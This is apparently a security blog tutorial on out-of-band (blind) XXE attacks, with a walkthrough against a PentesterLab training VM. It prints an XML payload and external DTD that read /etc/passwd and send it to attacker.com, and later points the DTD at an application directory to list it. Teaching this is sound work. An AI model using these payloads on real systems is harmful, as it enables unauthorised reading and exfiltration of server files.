Thursday, August 1, 2019

XML External Entities - Out of band - Part III

XXE Attack -


Hi Techies!! In XML External Entities - Inband - Part II, we discussed the Inband XXE Attack. In this part, we will be discussing Out of Band XXE Attack along with an example which would illustrate the attack in detail.

What is Out of Band?

Out of Band XXE (also called Blind XXE) attacks are the attack in which an attacker does not get immediate response from the server. The exploitation process of Out of Band is similar to Inband i.e., using parameter entities, which also involves the creation of an external DTD (Document Type Definition). The major difference between these two attacks is - in Out of Band the attacker uses an XML parser to make an additional request to the attacker's webserver to read the contents of the local file.


For example:
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE data SYSTEM "http://attacker.com/jagskap.dtd">
<data>&e1;</data>


jagskap.dtd
<!ENTITY % p1 SYSTEM "file:///etc/passwd">
<!ENTITY % p2 "<!ENTITY e1 SYSTEM 'http://attacker.com/jagskap?%p1;'>">
%p2;


The Out of Bound XXE Attack is conducted as follows:
  • First, the XML parser makes a request to the attacker's DTD file at http://attacker.com/jagskap.dtd.
  • After the jagskap.dtd file is fetched, the %p1 entity is processed by XML Parser, which loads the content of /etc/passwd file in p1.
  • The %p2 entity creates a general entity called &e1, which contains a URL. This URL includes the file contents of p1. The URL looks like http://attacker.com/jagskap?root:!:0:0::/:/usr/bin/sh...
  • Finally, after the URL is constructed, the XML parser processes the &e1 entity, which makes a request to the attacker's server.
  • The attacker can log the request on their end and reconstruct the file from the log entry.


DEMO


For the demo purpose, we will be using Pentesterlab ISO. You can download the ISO file from https://pentesterlab.com/exercises/play_xxe/iso.


Step 1: Run the ISO file in the Virtual Box and check the IP Address.
  • Target - 192.168.56.102
Step 2: Now with the attacker machine navigate to http://192.168.56.102/login.


Exhibit 1

Step 3:  Intercept the request using a proxy tool like BurpSuite as shown in Exhibit 2.


Exhibit 2

Step 4: Let us check if the application is vulnerable to XXE Injection. To do so, let us modify the request by changing the Content-type to text/xml and add xml data in the POST request as shown in Exhibit 3.

Exhibit 3

It can be observed that the application server responds with Invalid XML telling that the server parses XML. The only issue is that we don't have any data that is being reflected from the server-side making it blind based attack. So even if we request /etc/passwd file from the server, the server won't send it in response. Thus we need to find another way. Here, an External DTD plays an important role. We will make use of external DTD to get /etc/passwd file.

Step 5: Create a DTD file named “jagskap.dtd” with the content as shown in Exhibit 4 and host the file in the attacker’s server using Xampp or Apache.


Exhibit 4

Step 6:  Finally, we need to send the XML entity payload, as shown in Exhibit 5.


Exhibit 5

Step 7: When executed we can see that the target server makes and request to the attacker’s server as was intended and dumps the /etc/passwd file content in the request as shown in the Exhibit 6.


Exhibit 6

Step 7: Further, we can view the other files and directories as well. To do so, go back to the content of /etc/passwd file, we can see that a play user exists. The home directory of this user is /opt/play-2.1.3/xxe/ as shown in Exhibit 7, there is a good chance that it’s where the application is located.


Exhibit 7

Step 8: Depending on the XML parser, it's also possible to retrieve the listing of a directory. The only way to see if it works is to try. Here we can modify the DTD file to point to /opt/play-2.1.3/xxe/ as shown in Exhibit 8.


Exhibit 8

Step 9: Let us send this request to the server as shown in Exhibit 9.


Exhibit 9

Step 11: Bingo!!!! The content of the directory is being displayed as a part of the request as shown in Exhibit 10.


Exhibit 10


I hope this blog helped you clear your concept of Out of Band XXE. XML External Entities - Billion Laughter Attack - Part IV talks about how XXE can be used for Denial of Service Attack. To know more about Billion Laughter Attack please view XML External Entities - Billion Laughter Attack - Part IV. Please like, share and comment.

References

https://www.acunetix.com/blog/articles/band-xml-external-entity-oob-xxe/